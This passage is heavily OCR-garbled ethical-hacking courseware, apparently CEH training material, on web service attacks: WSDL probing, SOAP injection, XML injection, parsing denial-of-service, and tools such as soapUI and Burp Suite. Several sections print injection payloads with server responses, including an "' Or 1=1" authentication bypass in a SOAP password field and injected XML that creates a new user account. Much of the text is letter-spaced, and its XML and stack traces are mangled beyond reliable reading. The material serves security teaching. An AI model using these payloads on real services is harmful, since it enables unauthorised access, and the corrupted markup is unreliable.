k e r can ch o o se th e a tta c k to c o m p ro m is e w e b services. If th e a tta c k e r's in te n tio n is to s to p a w e b se rvice fro m se rvin g in te n d e d users, th e n the a tta c k e r can launch a d e n ia l-o f-s e rv ic e a tta c k by s e n d in g n u m e ro u s re q u e s ts. V a rio u s ty p e s o f a tta c k s used to a tta c k w e b services are: SOAP In je c tio n X M L In je c tio n W SDL P ro b in g A tta c k s In fo rm a tio n Leakage A p p lic a tio n Logic A tta cks D atabase A tta c k s M odule 13 Page 1897

176 Q DoS A tta c k s Web Services SOAP Injection, XML Injection WSDL Probing Attacks I n f o r m a t i o n L e a k a g e, A p p l i c a t i o n L o g i c A t t a c k s Database Attacks, DoS Attacks F I G U R E : A t t a c k W e b S e r v i c e s M odule 13 Page 1898

177 W eb S ervices P ro b in g A ttacks ר d o cu m e n t fro m w eb service tra ffic and analyzes it to 6 In th e firs t step, th e attacker traps th e WSDL dete rm in e th e purpose o f th e applica tion, fu n ctio nal break dow n, entry points, and message types CEH Urtifwd ilhiul lutbm 6 Attacker then creates a set o f valid requests by selecting a set o f operations, and fo rm u lating th e request messages according to th e rules o f th e XM L Schema th a t can be s u b m itte d to th e w eb service 9 These attacks w o rk sim ilar to SQL in je ctio n attacks «A ttacker uses these requests to include m alicious contents in SOAP requests and analyzes errors to gain a deeper understanding o f potential security weaknesses <?>o:ml versions" 1,0" encoding "utf-8"?> v. - r : ur. A tta c k e r A tta cker inject a rb itra ry character (') in the input field ' standalone encoding "UTF S' verslon "I.O- <?xml no*?> - <$QAP-ENV: Envelope )(mlns: SOAPSOKl " XMLschcma' xmlns: http " S0APSDK2 ://w w w.w3.org/200 l/xmlschem.o- Inst.once" xmlns: S0APSDK3«" SOAPENV.org/soap/ encoding/' xmlns: ' envelope/'> <SOAP- ENV Body - <SOAPSDK 4: GetProdUctlnformationByName xmlns: SQAPSDK4 ' > [<SQAPSDK4; name? ^SQAP3DK4; n a m d <S0APSDK4: uid> S43</SOAPSDK4:uid> <S0APSDK4: password> 5648</SOAPSDK4: password> </SOAPSDK 4: GetProduc t In forma ti 0 n B y Name> </SOAP ENV: Body </SOAPENV: Envelope> Server th ro w s an error / envelope soap " <soap: Envelope xmlns: - xmlns: xsi=" http :// instl'lnce - " xmlns: xsd='http :// <soap: Body> <soap:fault> <faultcode>soap:server</faultcode> <faultstring>system. Web.Services.Protocols.SoapException: trw m iw ti to ' procat request -> ryrtem Oata.OUDb.OMDb* nceptlon Syntax rror (milling operator) n quwv t.prn product name Ilk ' and provlderld ' *. At tyttem Data.Ole Db.OleDbc omm and liecutc( omm and Tea tluar Hand ng I MU hr) t lystemdata.oledb.oledbccmma ndlneartecomma ndtert>ors lngle«o«1jt liagobtaftams dbfaramt. Obiectg, e«ea/teheu>t) t system Data.OleOb.OleOOCommand ( ecule(ommandtrat Ot>;cct&eaocut<*<et 1/t) at System Data (*<06 CMObCemmand UeaiteCommand!Command Behavior beftavlor. Object* axactfafteiun) at S*«wn Oata OUOb CteObCo mm and. likukke adcri ntcrna!(command Behavior behavior. String met hoe) at Syftam.Oata.OMDb.OMObccn1mand.ixaa«teKeader Con1mandBehBv1ar behavior) at iystem Data.OleDkOleObcommand laea/tekcader() at Pvoduet Mo. ProductOBAaess bet Produd IrVarmatlonlStrlng productmame, String uld, String password) at 0 ProdjetlnfaPtoduclnfoXiatProdualnl or mat ion &* Name( Siring name, String jd. Stnrg password) Ind inner axctpoon stack trac </faultstring> <detail /> </soap: Fault> </soap : Body> </soap: Envelope> C o p y r ig h t b y EG-Gouacil.A ll R ig h ts R e s e rv e d. R e p r o d u c tio n is S t r ic t ly P r o h ib ite d. W e b S e r v i c e s P r o b i n g A t t a c k s In th e fir s t ste p, th e a tta c k e r tra p s th e W SDL d o c u m e n t fro m w e b se rvice tr a ffic and analyzes it to d e te rm in e th e p u rp o s e o f th e a p p lic a tio n, fu n c tio n a l b re a k d o w n, e n try p o in ts, and m essage ty p e s. These a tta cks w o rk s im ila rly to SQL in je c tio n a tta c k s. The a tta c k e r th e n c re a te s a se t o f v a lid re q u e sts by s e le c tin g a se t o f o p e ra tio n s, and fo rm u la tin g th e re q u e s t m essages a c c o rd in g to th e ru le s o f th e X M L Schem a th a t can be s u b m itte d to th e w e b se rvice. The a tta c k e r uses th e s e re q u e sts to in c lu d e m a lic io u s c o n te n t in SOAP re q u e s ts and analyzes e rro rs to gain a d e e p e r u n d e rs ta n d in g o f p o te n tia l s e c u rity w ea kne sses. Attacker >... Attacker inject a rb itra ry character (') in the input field standalone 'U TF-S' encoding version1.0" <?xml no'?> <SOAP*ENV: Envelope )(mlns: SOAPSDKl=" XMLschema' xmlns: SOAPSDK2="http ://w w w.w3.org/200 l/xmlschem.o- inst.once" xmlns: SOAPSDK3=" SOAPENV.org/soap/ encoding/' xmlns: envelope/'* - <SOAP- ENV:Body> - <SOAPSOK4: GetProdUctlnformationByName <י 0/ ^1 ^1 0^ ^ ^ 51 ו 81 ^ / : ^ ו 1 SOAPSDK4=' xmlns: ks0apsdk4: name> </S0APSDK4:namel <SOAPSOK4: uld> </SOAPSDK4: uid> <S0APSDK4: password* 5648</SOAP$DK4: pa39word> </SOAPSDK 4: GetProduc t In forma tio n B y Name> </SOAP ENV: Body> </SOAP ENV: Envelope* S e r v e r t h r o w s a n e r r o r <?>o:ml version " I, O" encoding "utf-8" 1> <soap: Envelope xmlns: soap=' envelope/" xmlns: xsi="http ://w w w.w3.org/2001/xmlschem~- instl'lnce " xmlns: xsd='hup:// l/xmlschemlt> <soap: Body> <soap:fault> <faukcode>soa p:se rver</faultcode> <fauhstring>system. Web.Services.Protocols.SoapException: v^a^unahi.'-o process request 1y5t em.dale.oleob.cxeobcxception: Syntax error Imissinc operator I in query u p m m productnamelike and provide rid -' ". At sy(tenvdata.o4edb.qle0bconvnand.executc(ommandtexterr>rhandling 11nt32 hr) at»ys tern Data.CMeOto.OleOtxomrra nd.executecommindtemtfoi SintfeReuill ItagDSPARAMS dbparam?, Objects execi* ekesu ft) at sy* t rm_d«fa.oi e Db.QUCbcomniand f xecutrcorrmand Tart( Objrtt&m rcu t pftnult) at Sy»t em.dat a HleOfe OteCXjCommiod.ExecuteCommind (Command Behavior behdvioi. Objects exauttftemlt)4t System Data.0*roh.OlcDbCo mm and. txecuteneoderi ntc ma I (command Behavior bchavior, String m< t hod) at System.Oats.(JleOb.deDtxonwTwindt xn 1Hrsdn(( aniniflndrdiavior behavior) at S'nt«mi>atd.Ol«ObXlleOtx«11*11<1r1dExk;1u terc^dud at Pi oduct Info. ProdwUOSAuiL-u Qet Piodwct informat ioo striflg p rodu<tnamcv st ri nj uld, St ring password) at P'0d1Ktlnfc.PTuduclnl<xCetP10duc(ln(urn«tianBYN«1n^StrinRname,$t(1n«u»d,String pammreid) Cndol inner Mcepttonstadctrar- </faultsthng> <detail /> </soap: Fault> </soap : Body> </30jp: Envelope-' F I G U R E : W e b S e r v i c e s P r o b i n g A t t a c k s M odule 13 Page 1899 Ethical Hacking and C ounterm easures Copyright by EC-C0l1nCil

178 Web Service Attacks: SOAP Injection J A t t a c k e r i n j e c t s m a l i c i o u s q u e r y s t r i n g s i n t h e u s e r i n p u t f i e l d t o b y p a s s w e b s e r v i c e s a u t h e n t i c a t i o n m e c h a n i s m s a n d a c c e s s b a c k e n d d a t a b a s e s J T h i s a t t a c k w o r k s s i m i l a r l y t o S Q L I n j e c t i o n a t t a c k s O O h ttp ://ju g g y b o y.c o m /w s /p ro d u c ts.a s m x 0 d ) Server Response Account Login Usernam e f % Password [ o n <?ul T«r: 10a 1.0 ine«d1b9 'UTF-0' standaloo '##"?> - <SQk?-DIV:tav< pe xnilns S O A P C D K l-http //wvw v). or«/2001/x H LScb«i alas: SQAPS0X2 h t t p //WWW w3 rg / / XMLGchar* in s ta o c e als: S0APSDK3 h ttp : //sch c sm :. xb1:o«p. o tf /s o tp /ib e e d i o ( / ' u l a i SOAPEKV- llf/ioip lenvclopcl > - <S0AP-DfV Body - <2QA?SDX4 G«tProductlnfonmtionByNftoe a l a : : SQAPSDX4*' http // }uggyboy/productinfo /'> <20APSDK4: name. % </S0APSDK4 : name> <20APSDK4: u1d> </SQAPSDK4 : m d > < 0APSDK4: pa::word> Or 1= 1 Or blah = 1</S0APS0K4 : pas </S0APS0K 4 GetfrodnctlnforaitiooByNwo c/soap-ekv Body: </S0AP- OT/ : Envelope* <? x m l v e r s i o n " 1. 0 e n c o d i n g = " u t f - 8 '? > - < s o ^ > : E n v e lo p e x m ln s : s o a p = ', h t t p : / / s c h e m a s. x m l s o a p. o r g / s o a p / e n v e l o p e / " x m ln s : x s i ' h t t p : / /w w w. w3. o r g / /X M L S c h e m a - i n s t a n c e ' x m ln s : x s d 'h t t p : //w w w. w 3. o r g / / XM LS chem a '> - < s o a p :B o d y > - < G e t P r o d u c t ln f o r m a t io n B y N a m e R e s p o n s e < / o " h t t p : / / j u g g y b o y / P r o d u c t I n f x m ln s > lt < G e t P r o d u c t ln f o r m a t io n B y N a m e R e s u < p r o d u c t i d > 2 5 < / p r o d u c t! d > < p r o d u c t Name > P a in t in g l0 1 < / p r o d u c t N a m e > < p r o d u c t Q u a n t i t y > 3 < / p r o d u c t Q u a n t i t y > < p r o d u c t P r i c e > < / p r o d u c t P r ic e > < / G e t P r o d u c t ln f o r m a t io n B y N a m e R e s u lt > < /G e t P r o d u c t l n f o rm a tio n B y N a m e R e s p o n s e > < / s o ^ > : B o d y > < / s o a p : E n v e lo p e > C o p y r ig h t b y EC-Cauactl. A ll R ig h ts R e s e rv e d. R e p r o d u c tio n is S t r ic t ly P r o h ib ite d. W e b S e r v i c e A t t a c k s : S O A P I n j e c t i o n S im p le O b je c t Access P ro to c o l (SOAP) is a lig h tw e ig h t and s im p le X M L -b ase d p ro to c o l th a t is d e sig n e d to e xchange s tru c tu re d and ty p e in fo rm a tio n on th e w e b. The X M L e n v e lo p e e le m e n t is a lw a ys th e ro o t e le m e n t o f th e SOAP m essage in th e X M L sch e m a. The a tta c k e r in je c ts m a lic io u s q u e ry strin g s in th e user in p u t fie ld to bypass w e b services a u th e n tic a tio n m e ch a n ism s and access b a cke n d d ata base s. This a tta c k w o rk s s im ila rly to SQL in je c tio n a tta cks. Q A cco u n t Login U s e r n a m e f % P assw ord > כ ב ^ o r 1 1 orb b h SLbni: <?xk1 v e r s i o n - ' 1. 0 ' e n c o d in g - U T r- 8 ' s t a n d a l o n e - 'n o "? > - < S 0A P -B N V :E nvelope x m ln s : SOAPSDKl-' h ttp ://w w w.w 3.o r g /2 0 0 l/* M L S c h e 1 m i n i : SOAPSDK2 ' http ://www. w3.org/ 2001/ XMLSchema - inatance' xalm: SOAPSDK3=' xalna: SOAPEKV- h t t p : / / * c h e * 1d s.x ja l8 0 a p.0 r g /8 0 a p J e n v e l o p e J r> <S0AP-BNV:B0dy> - < S O A P S D K 4 :O etp ro d o ctln fo r«o tio n B y N n m e n l n s : S0APSDK4 ' h t t p : / / j u g g y b o y /P r o d u c tl n f o / '> <SOAPSDK4 naae>% </SOAPSDK4: name> <S0A?SBK4: uld> </SOAPSDK4: uld> <SOAPSDK4: paaaword>' Or 1* 1 Or b l a h </SOAPSDK4: paaaword> </SOAPSDK 4: cotprodactlnformatlonbynamo> </SOAP ENV:B0dy> <JSOAP BNV : Envoiopo> Server Response <? x m l v e r s i o n = " l. 0 " e n c o d i n g = " u t f - 8 '? > - < s o a p : E n v e l o p e x m l n s : s o a p = י ' h t t p : / / s c h e m a s. x m l s o a p. o r g / s o a p / e n v e l o p e / " x m ln s : x s i = ' h t t p : / / w w w.w 3. o r g / /X M L S c h e m a - i n s t a n c e ' x m l n s : x s d = h t t p : / / w w w. w 3. o r g / / X M L S c h e m a '> - < s o a p : B o d y > - < G e t P r o d u c t I n f o r m a t i o n B y N a m e R e s p o n s e x m l n s = " h t t p : / / j u g g y b o y / P r o d u c t I n f o / " > - < G e t P r o d u c t I n f o r m a t i o n B y N a m e R e s u i t > < p r o d u c t i d > 2 5 < / p r o d u c t i d > < p r o d u c t N a m e > P a i n t i n g l 0 1 < / p r o d u c t N a m e > < p r o d u c t Q u a n t i t y > 3 < / p r o d u c t Q u a n t i t y > < p r o d u c t P r i c e > < / p r o d u c t P r i c e > < / G e t P r o d u c t l n f o r m a t i o n B y N a m e R e s u l t > < / G e t P r o d u c t l n f o r m a t i o n B y N a m e R e s p o n s e > < / s o a p : B o d y > < / c o a p : E n v e l o p e > FIGURE : SOAP In je c tio n M odule IB Page 1900 Ethical Hacking and C ounterm easures Copyright by EC-C0l1nCil

179 Web Service Attacks: X M L Injection CEH A t t a c k e r s i n j e c t X M L d a t a a n d t a g s i n t o u s e r i n p u t f i e l d s t o m a n i p u l a t e X M L s c h e m a o r p o p u l a t e X M L d a t a b a s e w i t h b o g u s e n t r i e s X M L i n j e c t i o n c a n b e u s e d t o b y p a s s a u t h o r i z a t i o n, e s c a l a t e p r i v i l e g e s, a n d g e n e r a t e w e b s e r v i c e s D o S a t t a c k s S e r v e r S i d e C o d e S u b m it <?xm l " " version1.0 e n c o d in g " IS O !"? > cuser s> < u s e r> <u semame >gandal f < /u sername> < p a ssw o rd > י c 3 < /p a s s w o rd > < u s e r id > l0 1 < /u s e r id > <ma1 1 > g a n d a lf 0 n u d d le e a r t h. ccnk / m a il> < /u s e r > < u s e r> <u s e m a n e >Mar k < / u s e r name> < p a s s w o rd > l2 3 45< /p assw o rd > < u s e r id > l0 2 < /u s e r id > < m ail>gandalf (?m iddleearth. cotrk /m ail> [email protected]</mail> </user> <u$er> <username>jason</usemame> <password>attack</password> <userid>105</useridxmail>jason (Sjuggyboy.com J < u s e r> <u s e m ame > j as on< /u s e m am e> < p a s s w o rd > a ttc )c < /p a s s w o rd > < userid>105</userid> < m a il> ja s o ju g g y b o y c o n K /m a il> < ^ u s e r> < /u s e rs > C re a te s n e w o n t h e s e r v e r C o p y r ig h t b y E C -G a u a c tl. A ll R ig h ts R e s e rv e d. R e p r o d u c tio n is S t r ic t ly P r o h ib ite d. W e b S e r v i c e A t t a c k s : X M L I n j e c t i o n The process in w h ic h th e a tta c k e r e n te rs va lu e s th a t q u e ry X M L w ith va lu e s th a t ta k e a d va n ta g e o f e x p lo its is k n o w n as an X M L in je c tio n a tta c k. A tta c k e rs in je c t X M L d a ta and tags in to user in p u t fie ld s to m a n ip u la te X M L schem a o r p o p u la te X M L d a ta b a se w ith bogus e n trie s. X M L in je c tio n can be used to bypass a u th o riz a tio n, e scala te p rivile g e s, and g e n e ra te w e b services DoS a tta cks. o o Account Login Username Mark Password a m ark@ >certifiedhacker.com </mailx/user> A <user> <username>jason</username> <password>attack</password> <userid>105</useridxmail>jason@ >juggyboy.com S e r v e r S i d e C o d e <? x n l v e r s io n 1. " * encoding-'iso l"?> < u s «r s > < u s * r > < / u s e r > < u s r n M M > g a n d a 1 *< / u s «r n «n > < p a s 3 w o rd >! a 3 < /p a s s w o rd > < u s e r i d > < / u s «r i d > <. r a i l > g a n d a l f 'r. id d le e a r t h. c o m < /r. a i l > < u s «r > < u s e rn a!n e > M a r]c< /u sern a 1ne> < p» 3 3 w 0 r d > < /p a 3 3 v 7 0 r d > < u s e r i d > < / u s e r i d > < r 1 a i l > g a n d a l 3 m i d d l ««a r t h. c o m < /m a il> < /u s «r > J ^user5 I <ua*rna.*n#> ja s o n < /u s «rn a m e > ; I <pas3word>attck</pa3sword>! < userid>105</us«rid> <m a!l>jasont" juggyboy. oom < /m»il> < /u 3 * r > < / u 1 «r! > C r e a t e s n e w u s e r a c c o u n t o n t h e s e r v e r FIGURE : XML In je c tio n M odule 13 Page 1901

180 W eb S ervices P arsin g A ttacks CEH B P a r s i n g a t t a c k s e x p l o i t v u l n e r a b i l i t i e s a n d w e a k n e s s e s i n t h e p r o c e s s i n g c a p a b i l i t i e s o f t h e X M L p a r s e r t o c r e a t e a d e n i a l - o f - s e r v i c e a t t a c k o r g e n e r a t e l o g i c a l e r r o r s i n w e b s e r v i c e r e q u e s t p r o c e s s i n g A t t a c k e r q u e r i e s f o r w e b s e r v i c e s w i t h a g r a m m a t i c a l l y c o r r e c t S O A P d o c u m e n t t h a t c o n t a i n s i n f i n i t e p r o c e s s i n g l o o p s r e s u l t i n g i n e x h a u s t i o n o f X M L p a r s e r a n d C P U A t t a c k e r s s e n d a p a y l o a d t h a t i s e x c e s s i v e l y l a r g e t o c o n s u m e a l l s y s t e m s r e s o u r c e s r e n d e r i n g w e b s e r v i c e s i n a c c e s s i b l e t o o t h e r l e g i t i m a t e u s e r s r e s o u r c e s C o p y r ig h t b y EC-Cauactl. A ll R ig h ts R e s e rv e d. R e p r o d u c tio n is S t r ic t ly P r o h ib ite d. W e b S e r v i c e s P a r s i n g A t t a c k s A p a rsin g a tta c k ta kes place w h e n an a tta c k e r succeeds in m o d ify in g th e file re q u e s t o r s trin g. The a tta c k e r changes th e va lu e s by s u p e rim p o s in g o n e o r m o re o p e ra tin g syste m c o m m a n d s via th e re q u e s t. P arsing is p ossib le w h e n th e a tta c k e r e xecu te s th e.b a t (b a tc h ) o r.cm d (c o m m a n d ) file s. Parsing a tta c k s e x p lo it v u ln e ra b ilitie s and w e a kne sses in th e p ro cessin g c a p a b ilitie s o f th e X M L p a rs e r to c re a te a d e n ia l-o f-s e rv ic e a tta c k o r g e n e ra te logical e rro rs in w e b se rvice re q u e s t p ro cessin g. R e c u r s i v e P a y l o a d s X M L can e asily n e st o r a rra n g e th e e le m e n ts w ith in th e single d o c u m e n t to a ddre ss th e c o m p le x re la tio n s h ip s. An a tta c k e r q u e rie s fo r w e b se rvices w ith a g ra m m a tic a lly c o rre c t SOAP d o c u m e n t th a t c o n ta in s in fin ite p ro ce ssin g lo o p s re s u ltin g in e x h a u s tio n o f X M L p a rs e r and CPU reso urces. O v e r s i z e P a y l o a d s In th e s e p ayloads, X M L is re la tiv e ly ve rb o s e and p o te n tia lly large file s are a lw a ys in to th e c o n s id e ra tio n o f p ro te c tin g th e in fra s tru c tu re. P ro g ra m m e rs w ill lim it th e d o c u m e n t's size. A tta c k e rs send a p a ylo a d th a t is e xce ssive ly large to co n s u m e all syste m reso u rces, re n d e rin g w e b se rvices ina ccessib le to o th e r le g itim a te users. M odule 13 Page 1902

181 Web Service A ttack Tool: soapui s o a p U I is a o p e n s o u r c e f u n c t i o n a l t e s t i n g t o o l, m a i n l y u s e d f o r w e b s e r v i c e t e s t i n g I t s u p p o r t s m u l t i p l e p r o t o c o l s s u c h a s S O A P, R E S T, H T T P, J M S, A M F, a n d J D B C A t t a c k e r c a n u s e t h i s t o o l t o c a r r y o u t w e b s e r v i c e s p r o b i n g, S O A P i n j e c t i o n, X M L i n j e c t i o n, a n d w e b s e r v i c e s p a r s i n g a t t a c k s C o p y r ig h t by EC-Cauactl. A ll R ig h ts R e s e rv e d. R e p r o d u c tio n is S t r ic t ly P r o h ib ite d W e b S e r v i c e A t t a c k T o o l : s o a p U I T S ource: h ttp ://w w w.s o a p u i.o rg soapu I is an o p e n so u rce fu n c tio n a l te s tin g to o l, m a in ly used fo r w e b se rvice te s tin g. It s u p p o rts m u ltip le p ro to c o ls such as SOAP, REST, HTTP, JM S, A M F, a n d JDBC. It e n a b le s you to c re a te a d va n ce d p e rfo rm a n c e rests v e ry q u ic k ly and ru n a u to m a te d fu n c tio n a l te s ts. W ith th e h e lp o f th is to o l, a tta c k e rs can e asily p e rfo rm w e b se rvices p ro b in g, SOAP in je c tio n, X M L in je c tio n, and w e b se rvices p a rsin g a tta cks. M odule 13 Page 1903

182 = * lo o k Q#sktop U#lp 1vD<3 [IP Projects 0 4 C? * o B 1 sample-service 3 I SarrpfeSer v cesod[ buy Recuest PrppefOes L ע Request 1 ך Property J 1/alue Request 1 1-1, P b Messaoe 5ize 277 inocing Encboirt 3nc Address UTF-8 Rcdi... true oflov Jserane -,assv'0'd >xnan Autncntica... *ftss^ass... W55 rmet... SSL Keyatore Slop SOAP... fake EnaDle M7CW false rwtemtom Global HTT... fol»c I Hire Rcep... false txpandmt.. false bodbe axil... (rue EnoxScAet... false falc# FrwrtU nln Proper fc#e I SamplcSc1-viccSo,1pBindng soaplll 451 ' Overvie/v ' ServiceEncpwnts \ WSD1 Cement WS-lConplaxe 0 m.י l±> C_l Comdex Type C ~ nous Aron y ט CD Global encn C3 Schemas Messages & 0 y 7 buyreque j j part: 5 Q port: J C3 bu/respc I C 3 buy_fadt I : Ihd boirrea mcabgirrespj Q& bgin_f0jlii * part: p CD bg0jtr.ec O booutres ih C b co jt fa C3 searchre pa l;<^1tty://a ww.cxa11plc.otg/>ertulc/ ן x sample-ser\ke./.-sd flb:\c:lm$0svuft1t1isi,d :a Vodpd-Tutor iab\wsd-w AO. vice./vsd <vsdl :sessaae na1»="3ear2hre3pcn3e"> <v a i:par- ear^&re3ulf na1g=3 eienenc= 1: 3earchRespor.3e,*/> < /w sdl :n c :3 a jc > <vsdl:1ne35age nan6="buyse<1ue3t"> <vsdl:par- r-a2se= 3ess10nd* type= xsci: string"/> < v -d l.p a z s n n i r - **buyasrijig" t-ypc x=<i. 3t u i n g / > <, vsdl : n a c B a j o <vsdl:2ressaaa na!1e="bu sre spo a s e " > cwsdl.pars buyrasuls = naue elenen^= tna:puyrespoase /^ < /v 9 d l:m e :3 a ;e > <vsdl tn 5aa nat *="Login_fa jltm3g"> םv=dl:par > nane="loginfault" cype=*xsd:string"/> i / w s d l.a e : 3 a je > «g"> a d l -m i c a ^ n a n e= " lo g o u t_ f Ju ltm < v s d l:p a r t r ^ x a = " Io q o J tia u lt'* typ-3="x3d: s t r in g V > m 1 1- M& S d S F I G U R E : s o a p U l T o o l S c r e e n s h o t M odule 13 Page 1904

183 Web Service Attack Tool: XMLSpy C EH j A ltova XMl Spy A l t o v a X M L S p y i s t h e X M L e d i t o r a n d d e v e l o p m e n t e n v i r o n m e n t f o r m o d e l i n g, e d i t i n g, t r a n s f o r m i n g, a n d d e b u g g i n g X M L - r e l a t e d t e c h n o l o g i e s : Ercwso Fic E it Frcject >M- DTDfSchcmo Cchcrno design XSLJXQucry Authentic Convert View : WSDL SOAP Tools Window Help a i a. a, a j 1 ^ i p i i a i n i g i B! r, W H f f i i l F b & 00 jg 1> ft, [^<s- <y B! y.כ ; httptvivsw'as orgf20 m/xml cnerria-1nsta nee xsl scnenralocation http/xm s 3y. nevag e r c/fschem astoersonn el C:\rneAaemvx$d'> -P c io o ra D o io - 1< NiM^/FirstNJarr1«s j < la stn a m e» 0evgood«f ncyr 3 Ksi:fot eachse1ect=" n1:firs1name"> י > I I i i I 1I span style -'col or: navy: font-famity:arial; font size :12pt; font-we1ahtbold;"> II II: III < פ ד י/ס ppv-tompialo ג: cj» «pan> XSL O u tp u t, h tm t A T h e P e rs o n n F ir s t N a i r n Q 'h * A * n c >«3 A q e n ts tj ( ) Per vjt adato tl () lrsnane 0 () -ostmoire ra () H e Elcniat Oamert lerf Etoner* ElOTtcr* Concert Varables <FattvWatah X Call Stack V<lu» / Atlrih N»<n» D ccunrnt xsl:rcr-eech TheAgencyR3.xsf Tertiporarr Re$» * _ Res eo=h xsl:fo Thc.AgcncyR3.x5H Temporary vsl:f<y-*!ch Th*A{jf>nryR3 *«H TMpor»rvR«1 xsl:for-ea:h TheAgencyR3.xsH Temporary Res! v kocty Thc.AgcncyR3.xiH Tcnpwar/Rc5< v Call Stack Templates Into Messaoes Trace h ttp ://w w w. altova.com C o p y r ig h t b y E C -C a u a c tl. A ll R ig h ts R e s e rv e d. R e p r o d u c tio n is S t r ic t ly P r o h ib ite d. W e b S e r v i c e A t t a c k T o o l : X M L S p y ^ 2 S ource: h ttp ://w w w.a lto v a.c o m A lto v a X M LSpy is th e X M L e d ito r and d e v e lo p m e n t e n v iro n m e n t fo r m o d e lin g, e d itin g, tra n s fo rm in g, and d e b u g g in g X M L -re la te d te c h n o lo g ie s. It o ffe rs g ra p h ic a l sch e m a d e s ig n e r, S m a rt Fix v a lid a tio n, a code g e n e ra to r, file c o n v e rte rs, d e b u g g e rs, p ro file rs, fu ll d a ta b a se in te g ra tio n, and s u p p o rt fo r WSDL, SOAP, XSLT, X P ath, X Q uery, XBRL, and O pen XM L d o c u m e n ts, plu s V isual S tu d io and Eclipse p lu g -in s, and m o re. M odule 13 Page 1905

184 IAltova XMLSpy ( s J S 1 i File Edit Project XML DTD/Schema Schema design XSL/XQuery Authentic Convert View Browser i WSDL SOAP Tools Window Help I D I H j 0 1 # U U j B l l i B i I? I r a j f טטם ם ט ם h t t p :11w w w. w 3. o r g / 2 0 x s l : t e x t > 0 1 / X M L S c h e m a - i n s t a n e e " x s i : s c h e m a L o c a t i o n h t t p : / f x m l s p y. n e t / a g e n c y / s c h e m a s / p e r s o n n e l C : V T h e A g e n c y. x s d " > m < P e r s o n a l D a t a > < / s p a n > x s l : f o r - e a c h s e l e c t = " n 1 : F i r s t N a m e " > s p a n s t y l e = " c o l o r : n a v y ; f o n t f a m i l y : A r i a l ; f o n t s i z e : 1 2 p t ; f o n t - w e i g h t : b o l d ; * > The - Personn 3 3 N i k i < / F i r s t N a m e > ] < L a s t N a m e > 3 4 D e v g o o d < / frni The Agency R3 Q A g XSL Output.html x s i : a p p l y - t e m p l a t e s / > - s p a n > I I I I I I <t F i r s t N a m e : Context Name E) <> PersonalData FirstName Hx! ) { >< LastName ש l+l O Title I Type Element Element Text Element Element Context Variables XPath-Watch X Call Stack I Value / Attrib.. Name I Location Result Document * xsl:for-each TheAgencyR3.xslt Temporary Res! /v Niki n v xsl:for-each = xsl:for-each xsl:for-each body TheAgencyR3.xslt Temporary Res! TheAgencyR3.xslt Temporary Resi TheAgencyR3.xslt Temporary Res! TheAgencyR3.xslt Temporary Res! Call Stack Templates Info Messages Trace Step Into Ln 5, Col 19 NUM FIGURE 13.57: XMLSpy Tool Screenshot M odule 13 Page 1906

185 ^ M o d u l e F l o w So fa r, w e have discussed w e b a p p lic a tio n co n c e p ts, th re a ts a ssociated w ith w e b a p p lic a tio n, and th e h a ckin g m e th o d o lo g y. N o w w e w ill discuss h a ckin g to o ls. These to o ls h e lp a tta c k e rs in re trie v in g s e n s itiv e in fo rm a tio n and also to c ra ft and send m a lic io u s p a cke ts o r re q u e s ts to th e v ic tim. W e b a p p lic a tio n h a ckin g to o ls are e s p e c ia lly d e sig n e d fo r id e n tify in g th e v u ln e ra b ilitie s in th e w e b a p p lic a tio n. W ith th e h e lp o f th e se to o ls, th e a tta c k e r can e asily e x p lo it th e id e n tifie d v u ln e ra b ilitie s and c a rry o u t w e b a p p lic a tio n a tta c k s. ^ W e b A p p Pen T e s tin g W e b A p p C o n cepts ^ S e c u rity T o o ls W e b A p p T h re a ts C o u n te rm e a s u re s fs=9 H a ckin g M e th o d o lo g y S b ) W e b A p p lic a tio n H a ckin g T o o ls ץ -י ^ M odule 13 Page 1907

186 This se c tio n lists and d e scrib e s v a rio u s w e b a p p lic a tio n h a ckin g to o ls such as B u rp S uite P ro fe ssio n a l, C o o kie D ig g e r, W e b S cara b, and so on. M odule 13 Page 1908

187 Web Application Hacking Tool: Burp Suite Professional S ource: h ttp ://w w w.p o rts w ig g e r.n e t B urp S u ite is an in te g ra te d p la tfo rm fo r p e rfo rm in g s e c u rity te s tin g o f w e b a p p lic a tio n s. Its v a rio u s to o ls w o rk to g e th e r to s u p p o rt th e e n tire te s tin g process, fro m in itia l m a p p in g and analysis o f an a p p lic a tio n 's a tta c k su rfa ce, th ro u g h to fin d in g and e x p lo itin g s e c u rity v u ln e ra b ilitie s. B urp S u ite c o n ta in s key c o m p o n e n ts such as an in te rc e p tin g p ro xy, a p p lic a tio n - a w a re s p id e r, a d va n ce d w e b a p p lic a tio n sca nner, in tru d e r to o l, re p e a te r to o l, s e q u e n c e r to o l, e tc. M odule 13 Page 1909

188 I s Ethical Hacking and C ounterm easures b u rp su ite fre e e d itio n v [ ourp mtrujet repeater * ניתי* acoat mfruder rspaal ( saque decoder ' compare* ' 0f* 0ns Mart* p«der ג ז L 21 I target posiaons pa>ioads op«ons attack type *nicer 2 payload posaon* lengti i i s H> * HTTP ל 0 צ<< f :3 - th id Moat: c a 4.rv.b 1 n g.n e t P ro xy-c o n n e ctio n : k e e p -a liv e U set-a gent: H o : illa / 5. 0 iv indovs 1JT f. 2 ; WOV i 4! A י pplefebrit/s 37.4 KHTHL, lik e Gecko! C h ro w e /:: :9.9 4 S a fa c i/s A ccept: / P e te te c : h t t p : v v v.b in g.c js usages seated?qab ik e s ( id acccc7670 CSC1CD3A9DIEABE6(3SlKE8S7SD12 944KOPHa IQFPBA A ccept-e ncoding: g z ip,d e fla te,s d e h *וזז * r «a c *rtowvtg 1H * lull target positor* pajloads in tru d e r a tta c k 1 request position pajfoad *talus error 6 me leng* comment 0 1 ^ ] We ס Service AitacK we ס SeMce *itac* request response raw p 3tarr\ headers he! l o r r /th?id«1.4s07ulsoo48223lcpld!. 1 H T T P /1. 1 Host: t34.an.b1ng.net Pcoxy-Connection: keep-alive O sec-a gent: B o s ilu / 5. 0.Vindoirs NT.21 VOV 4» A p p le V e b r.it/s KHTHL, lik e Gecko* C hrone/ S afar 1/S 37.4 A c c e p t: / Peterer: h t t p : / / m. b in g. c o a / 1anag«9 s^arch7q-blkes41d-*ccc7 70fSC1CD3A9d:EABESe'3 FE8S7SD1ZS94 4FOPH IQFPBA ל 1 A ccept-b ncoding: g s ip,d e fla te,s d e h Accept-Lanyua<j : e n -U S.e n ;q -0.0 A cce p t-c h a rs e t: IS O -O O S 9-1,u tf-0 ;q -0.7, ;q -0.3 a M M U A K L / 1am ] nnnrn * 1 m* * F I G U R E : B u r p S u i t e P r o f e s s i o n a l T o o l S c r e e n s h o t M odule 13 Page 1910

